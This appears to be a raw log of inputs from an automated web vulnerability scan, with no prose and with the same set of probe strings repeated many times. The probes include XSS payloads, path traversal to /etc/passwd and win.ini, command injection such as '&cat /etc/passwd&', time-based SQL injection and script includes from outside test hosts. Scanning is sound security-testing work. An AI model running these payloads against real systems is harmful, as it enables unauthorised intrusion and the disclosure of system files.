1<script>prompt(988359)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(963536)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979825></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(981836)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(960117)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959596)"></g></svg>

response.write(9068397*9974523)

1

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(940088))>

1

1

'+response.write(9068397*9974523)+'

WEB-INF\web.xml

1<iframe src='data:text/html

1

&cat /etc/passwd&

1

"+response.write(9068397*9974523)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(938329)>

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961340)>

1

"&cat /etc/passwd&"

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(933527)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

cat /etc/passwd

1

1

1

1

1

1<img/src=">" onerror=alert(933149)>

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

1

1

1<ScRiPt%20>prompt(907859)</sCripT>

${99347+100468}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n906689=v901431

1&lt

1

1

|cat /etc/passwd#

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

)

<img acu onmouseover=prompt(995289) //>

1

.\./.\./.\./.\./.\./.\./etc/passwd

'|'ld

1

1

o1ilOP70'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1<input autofocus onfocus=prompt(986451)>

1

/etc/passwd

1

testasp.vulnweb.com

"|"ld

lDScKzTY')

'"()

^(#$!@#$)(()))******

'

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

1j7ZYhSX')

1

[url=http://www.acunetix.com]website security[/url]

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

CNcCKjHu')

1_krFkK <ScRiPt >prompt(982247)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

1

'

1

1

1

1

................etc/passwd

pR4aRKou'))

1

${@print(md5(acunetix_wvs_security_test))}\

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

http://hituu6mdaigLR.bxss.me/

1

1

1

-1

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

1

1

comments

-1)

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

&dir

1

http://www.acunetix.tst

-1))

1

'"

1

file:///etc/passwd

1

comments/.

1

1'"()&%<ScRiPt >prompt(939555)</ScRiPt>

'&dir&'

ufLrrgX8'

<!--

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(996256)</ScRiPt>

HxUwzCXW')

"&dir&"

1

1

1

1_934871

WEB-INF/web.xml

BGCU52Nm'))

|dir

1

1

1

WEB-INF\web.xml

1

1

'|dir

1

acu3097<s1﹥s2ʺs3ʹuca3097

1

"|dir

../../../../../../../../../../windows/win.ini

1

acux9088z1z2abcxuca9088

1

1

1<ScRiPt >prompt(937643)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<script>prompt(923918)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(966598)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963908></ScRiPt>

1

windowswin.ini

1

1

1<ScRiPt >prompt(936853)</ScRiPt>

................windowswin.ini

1

1

1<video><source onerror="javascript:prompt(917124)">

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(970453)"></g></svg>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

response.write(9932010*9972986)

1<div style=width:expression(prompt(900204))>

1

1

1

1

'+response.write(9932010*9972986)+'

1<iframe src='data:text/html

&cat /etc/passwd&

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"+response.write(9932010*9972986)+"

1

1

1<body onload=prompt(938236)>

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950641)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(928734)>

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6.5),0)/*'XOR(if(now()=sysdate(),sleep(6.5),0))OR'"XOR(if(now()=sysdate(),sleep(6.5),0))OR"*/

1

1

1

`cat /etc/passwd`

WEB-INF/web.xml

1<img/src=">" onerror=alert(917865)>

1

${100025+100307}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(6.5)))v)/*'+(select(0)from(select(sleep(6.5)))v)+'"+(select(0)from(select(sleep(6.5)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

WEB-INF\web.xml

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(904304)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

1some_inexistent_file_with_long_name%00.jpg

1&n926297=v956252

1

1

1&lt

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

-1)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

<img acu onmouseover=prompt(992996) //>

!(()&&!|*|*|

1

.\./.\./.\./.\./.\./.\./etc/passwd

-1))

"|"ld

testasp.vulnweb.com

'"()

1

1<input autofocus onfocus=prompt(963386)>

^(#$!@#$)(()))******

1

cfK5OP90'

1

/etc/passwd

'

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

4sHPlgyB')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

1

"

[url=http://www.acunetix.com]website security[/url]

1

xpusE220'))

1

1_Qn7Z3 <ScRiPt >prompt(988538)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

................etc/passwd

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

||cat /etc/passwd

1

http://hitQCG4DjPDjw.bxss.me/

1

-1)

1

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

1

1

-1))

1

1

1

comments

http://www.acunetix.tst

1

1

'&dir&'

8bkTO5bU'

'"

1'"()&%<ScRiPt >prompt(919770)</ScRiPt>

comments

file:///etc/passwd

1

1

"&dir&"

j4xo1spU')

<!--

'"()&%<ScRiPt >prompt(973672)</ScRiPt>

1

comments/.

1

1

mfvqMiwW'))

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1_937095

1

1

'|dir

1

1

WEB-INF/web.xml

1

"|dir

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu2615<s1﹥s2ʺs3ʹuca2615

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

acux3034z1z2abcxuca3034

1

1

1

1<ScRiPt >prompt(974527)</ScRiPt>

1

windowswin.ini

1

1

1<script>prompt(964808)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(927598)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975446></ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

response.write(9371219*9723188)

1

1

1<ScRiPt >prompt(997773)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

1

1

1<video><source onerror="javascript:prompt(918178)">

'+response.write(9371219*9723188)+'

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

"+response.write(9371219*9723188)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(960573)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1<div style=width:expression(prompt(983563))>

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<body onload=prompt(998611)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

WEB-INF\web.xml

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

${99226+100129}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993260)>

1&n990261=v927205

-1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<img src=xyz OnErRor=prompt(959199)>

-1)

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

)

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(934400)>

testasp.vulnweb.com

'

1

!(()&&!|*|*|

'"()

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(953804)</sCripT>

rhgkds0J'

"

'

1

^(#$!@#$)(()))******

1

1

1&lt

.\./.\./.\./.\./.\./.\./etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}

XFdyuCpB')

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<img acu onmouseover=prompt(950013) //>

1

1

/etc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

Tpo3vtFA'))

1

1<input autofocus onfocus=prompt(931927)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

&dir

-1

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

http://hithCWzzVzCPv.bxss.me/

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

'&dir&'

comments

[url=http://www.acunetix.com]website security[/url]

1

1

1

-1))

comments

"&dir&"

1_0WpDy <ScRiPt >prompt(938871)</ScRiPt>

1

................etc/passwd

1

http://www.acunetix.tst

'"

25u021mt'

1'"()&%<ScRiPt >prompt(985160)</ScRiPt>

comments/.

1

1

|dir

<!--

1

LexsqKhZ')

1

'"()&%<ScRiPt >prompt(951810)</ScRiPt>

1

1

1

'|dir

1

file:///etc/passwd

1_966009

8bPDWvH1'))

1

1

1

1

"|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

acu5118<s1﹥s2ʺs3ʹuca5118

1

1

1

acux7719z1z2abcxuca7719

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(993414)</ScRiPt>

1

1

1

1<script>prompt(989863)</script>

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(911935)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998532></ScRiPt>

1

windowswin.ini

1

1<ScRiPt >prompt(913320)</ScRiPt>

1

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(903336)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(914386)"></g></svg>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<div style=width:expression(prompt(952482))>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(989117)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9549388*9930303)

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963831)>

&cat /etc/passwd&

'+response.write(9549388*9930303)+'

1

1<img src=xyz OnErRor=prompt(998142)>

"+response.write(9549388*9930303)+"

1

1

1<img/src=">" onerror=alert(979733)>

1

1

WEB-INF/web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt%20>prompt(997569)</sCripT>

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

<img acu onmouseover=prompt(947578) //>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1<input autofocus onfocus=prompt(950541)>

1

1

1

${99531+100360}

-1)

`cat /etc/passwd`

<a href='http://www.acunetix.com'>website security</a>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

[url=http://www.acunetix.com]website security[/url]

1

1

|cat /etc/passwd#

1

1&n907231=v981054

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

6ja8ro1E'

1

1

1_cTDmS <ScRiPt >prompt(926202)</ScRiPt>

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

rGhXd74n')

1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

tvhFPexs'))

'"()

1

"|"ld

^(#$!@#$)(()))******

'

testasp.vulnweb.com

1

-1

1

1

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

"

1

1

1

-1)

1

1

1

'

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

http://hitswPWvQHiPN.bxss.me/

-1))

1

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

comments

1

Gz97N79K'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

||cat /etc/passwd

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

PKS3LJJJ')

1

1

'"

1

&dir

1

1

comments/.

................etc/passwd

z8XdJTuB'))

1'"()&%<ScRiPt >prompt(912820)</ScRiPt>

<!--

'&dir&'

1

1

1

'"()&%<ScRiPt >prompt(945920)</ScRiPt>

1

1

1

1

"&dir&"

1

1

file:///etc/passwd

1_995872

1

|dir

1

1

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

acu2386<s1﹥s2ʺs3ʹuca2386

../../../../../../../../../../windows/win.ini

1

1

1

acux3983z1z2abcxuca3983

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(922279)</ScRiPt>

1

1

1

1<script>prompt(912946)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(937124)</ScRiPt>

windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?909737></ScRiPt>

................windowswin.ini

1

1

1

1

response.write(9632788*9037235)

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(911749)</ScRiPt>

1

'+response.write(9632788*9037235)+'

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<video><source onerror="javascript:prompt(980729)">

1

&cat /etc/passwd&

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9632788*9037235)+"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(968049)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(901115))>

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

1

-1

1

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

cat /etc/passwd

1

1<body onload=prompt(951169)>

1

${100313+100118}

1

-1)

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n973300=v994535

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966286)>

1

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=xyz OnErRor=prompt(949371)>

JjhCnifn'

1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

cvREwJ7b')

1<img/src=">" onerror=alert(931531)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1

'"()

1

testasp.vulnweb.com

'

1<ScRiPt%20>prompt(983178)</sCripT>

^(#$!@#$)(()))******

SPS5VXCi'))

.\./.\./.\./.\./.\./.\./etc/passwd

"|"ld

1

1

"

1

1

1&lt

-1

1

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

-1)

1

<img acu onmouseover=prompt(966378) //>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

'

1

1<input autofocus onfocus=prompt(975733)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

NpK8dGaH'

1

1

"

<a href='http://www.acunetix.com'>website security</a>

1

................etc/passwd

http://hitRyUxDoInpj.bxss.me/

1

pw3dN4bu')

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

comments

1

1

1

||cat /etc/passwd

Ep3YjwKs'))

1

file:///etc/passwd

1_fMU93 <ScRiPt >prompt(957085)</ScRiPt>

1

comments

http://www.acunetix.tst

'"

&dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(915759)</ScRiPt>

comments/.

<!--

1

1

1

'&dir&'

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(937570)</ScRiPt>

1

1

1

1

"&dir&"

1

1

WEB-INF\web.xml

1_915675

1

1

|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

"|dir

1

acu8600<s1﹥s2ʺs3ʹuca8600

1

1

windowswin.ini

1

1

1

acux10857z1z2abcxuca10857

1

................windowswin.ini

1

1

1<ScRiPt >prompt(903818)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(977360)</script>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(956236)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957124></ScRiPt>

response.write(9625375*9199110)

1<ScRiPt >prompt(950294)</ScRiPt>

1

1

1

'+response.write(9625375*9199110)+'

1<video><source onerror="javascript:prompt(974768)">

&cat /etc/passwd&

WEB-INF/web.xml

1

1

"+response.write(9625375*9199110)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(942342)"></g></svg>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<div style=width:expression(prompt(945919))>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

1

1

1<body onload=prompt(979549)>

1

${99297+100004}

1

1

-1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997478)>

1

1

1

1

|cat /etc/passwd#

-1)

1

1&n963439=v947555

1<img src=xyz OnErRor=prompt(999259)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

'|'ld

1<img/src=">" onerror=alert(940487)>

1

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1

"|"ld

1<ScRiPt%20>prompt(900366)</sCripT>

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

an4ZtQZj'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1&lt

1

'

.\./.\./.\./.\./.\./.\./etc/passwd

62DFDiqJ')

1

1

<img acu onmouseover=prompt(934753) //>

1

1

1

'

"

/etc/passwd

ffHfiYLt'))

1<input autofocus onfocus=prompt(920544)>

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

${@print(md5(acunetix_wvs_security_test))}

-1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1)

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

1

1

1_xRl3i <ScRiPt >prompt(975463)</ScRiPt>

1

................etc/passwd

&dir

1

http://hitP8LkkumMce.bxss.me/

-1))

1

'&dir&'

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

ZrHtkrRN'

1

"&dir&"

1

file:///etc/passwd

1

http://www.acunetix.tst

comments

1

moNwY9uf')

1

1

|dir

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(911809)</ScRiPt>

0UBMG8i6'))

1

1

comments

1

<!--

1

'|dir

'"()&%<ScRiPt >prompt(996704)</ScRiPt>

WEB-INF/web.xml

1

comments/.

1

1

"|dir

1

WEB-INF\web.xml

1_926104

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8336<s1﹥s2ʺs3ʹuca8336

1

windowswin.ini

1

................windowswin.ini

1

acux4319z1z2abcxuca4319

1

1

1<ScRiPt >prompt(939366)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<script>prompt(984131)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(932563)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959125></ScRiPt>

1

1

1

1<ScRiPt >prompt(961431)</ScRiPt>

response.write(9929941*9802419)

1

1

1

1<video><source onerror="javascript:prompt(920633)">

1

WEB-INF/web.xml

'+response.write(9929941*9802419)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(995053)"></g></svg>

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9929941*9802419)+"

1<div style=width:expression(prompt(958141))>

'&cat /etc/passwd&'

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

cat /etc/passwd

1

1

1<body onload=prompt(900874)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(919233)>

1

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

${100155+100223}

1

-1

1<img src=xyz OnErRor=prompt(989078)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n903202=v968083

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<img/src=">" onerror=alert(943744)>

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1

1

'|'ld

1<ScRiPt%20>prompt(907959)</sCripT>

)

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

umrDcgyB'

!(()&&!|*|*|

1&lt

'

1

"|"ld

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

8dE8Y635')

<img acu onmouseover=prompt(904285) //>

^(#$!@#$)(()))******

1

"

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

cq5rO5th'))

1<input autofocus onfocus=prompt(969174)>

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

1

1

1

-1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

1

1

"

1

1

1

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

